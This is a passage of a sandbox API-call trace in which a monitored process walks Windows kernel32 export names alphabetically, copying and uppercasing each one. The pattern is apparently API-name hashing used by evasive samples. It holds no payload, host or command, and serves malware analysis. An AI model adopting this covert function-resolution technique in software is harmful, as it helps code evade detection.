[0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.729] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.729] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.730] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.730] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.730] lstrlenA (lpString="BEEP") returned 4 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.730] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.730] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.730] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.730] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.730] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.730] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.730] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.730] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.730] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.730] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.730] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.730] lstrlenA (lpString="CANCELIO") returned 8 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.730] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.730] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.730] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.730] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.731] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.731] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.731] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.731] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.731] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.731] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.731] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.731] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.731] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.731] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.731] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.731] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.731] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.731] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.731] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.731] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.731] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.731] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.732] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.732] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.732] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.732] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.732] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.732] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.732] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.732] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.732] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.732] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.732] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.732] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.732] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.732] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.738] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.738] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.739] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.739] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.739] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.739] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.739] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.739] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.739] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.739] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0086.739] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0086.739] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0086.739] lstrlenA (lpString="COPYCONTEXT") returned 11 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0086.739] lstrlenA (lpString="COPYFILEA") returned 9 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0086.739] lstrlenA (lpString="COPYFILEEXA") returned 11 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0086.739] lstrlenA (lpString="COPYFILEEXW") returned 11 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0086.739] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0086.739] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0086.739] lstrlenA (lpString="COPYFILEW") returned 9 [0086.739] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0086.739] lstrlenA (lpString="COPYLZFILE") returned 10 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0086.740] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0086.740] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0086.740] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0086.740] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0086.740] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0086.740] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0086.740] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0086.740] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0086.740] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0086.740] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0086.740] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.740] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.740] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.740] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.740] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.740] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.740] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.740] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.740] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.741] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.741] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.741] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.741] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.741] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.741] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.741] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.741] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.741] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.741] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.741] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.741] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.741] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.741] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.741] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.741] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.741] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.741] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.741] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.742] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.742] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.742] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.742] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.742] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.742] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.742] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.742] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.742] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.742] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.742] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.742] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.742] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.742] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.742] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.742] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.742] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.742] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.742] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.743] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.743] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.743] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.743] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.743] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.743] lstrcpyA (in: lpString1=0x3f2d1ec, 